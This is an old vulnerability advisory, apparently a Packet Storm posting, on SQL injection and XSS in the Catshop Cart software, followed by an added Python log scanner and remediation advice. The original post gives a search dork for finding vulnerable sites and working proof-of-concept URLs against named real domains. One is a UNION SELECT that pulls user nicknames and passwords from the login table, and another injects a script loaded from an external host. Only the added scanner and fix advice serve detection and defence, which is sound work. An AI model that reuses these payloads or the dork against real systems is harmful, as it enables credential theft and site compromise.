catshop-sqlxss.txt

๐Ÿ—“๏ธย 02 Jun 2008ย 00:00:00Reported byย e.wiZz!Typeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 31ย Views

Catshop Cart SQL Injection and XSS vulnerabilit


Code
`----------------------------------------------------  
  
Catshop Cart SQL Injection&XSS  
  
----------------------------------------------------  
  
/* INTRO /*  
  
  
By: e.wiZz!  
Info: It's not my fault 'coz i'm bosnian and unemployed. cheers  
Site: madspot.org  
mail: [email protected]  
  
/* OUTRO /*  
  
  
Script site: www.mns.it  
Info: Catshop is Shopping Cart developed by mns.it....other info is in italian,i can't translate and i don't care  
Dork: intext:"MNS Media & Net service" OR allinurl:/cat_shop/  
POC:  
  
SQL Injection:  
http://www.colferid.it/cat_shop/viewProduct.php?id=-1+union+all+select+1,2,nick,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+login/*  
http://sidermetal.biz/cat_shop/viewProduct.php?id=-1+union+all+select+1,2,nick,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+login/*  
  
XSS:  
http://colferid.it/cat_shop/viewProduct.php?id=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E  
  
  
  
  
  
`
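
A defender-side check built from the two request patterns in the advisory, as an added example that is not part of the original post: it scans web access logs for `viewProduct.php` requests whose `id` parameter is not a plain integer and labels the UNION SELECT and script-tag cases. The combined log format, the function names and the sample log lines (constructed, using documentation addresses) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line as it appears in a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
XSS_RE = re.compile(r"<\s*script\b", re.I)

def classify_id(value):
    """Return None for a plain integer id, otherwise a label for the anomaly."""
    if re.fullmatch(r"\d+", value):
        return None
    if SQLI_RE.search(value):
        return "sqli-union-select"
    if XSS_RE.search(value):
        return "xss-script-tag"
    return "non-numeric-id"

def scan(lines):
    """Return (line_number, label, decoded_id) for suspicious viewProduct.php hits."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/cat_shop/viewProduct.php"):
            continue
        # parse_qs percent-decodes the value and turns '+' into spaces,
        # so the patterns are matched against what the script receives.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            label = classify_id(value)
            if label:
                findings.append((n, label, value))
    return findings

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Jun/2008:10:00:01 +0000] "GET /cat_shop/viewProduct.php?id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Jun/2008:10:00:07 +0000] "GET /cat_shop/viewProduct.php?id=-1+union+all+select+1,2,nick,pass,5+from+login/* HTTP/1.1" 200 812',
    '203.0.113.9 - - [02/Jun/2008:10:00:09 +0000] "GET /cat_shop/viewProduct.php?id=%3CSCRIPT%20SRC=http://example.test/x.js%3E%3C/SCRIPT%3E HTTP/1.1" 200 640',
    '203.0.113.7 - - [02/Jun/2008:10:00:12 +0000] "GET /index.php?id=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because a legitimate product `id` is an integer, the same allow-list test applied server-side (cast to integer, then a parameterized query and HTML-encoded output) removes both issues at the source.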

Vulners AI Score: 7.4 (High risk)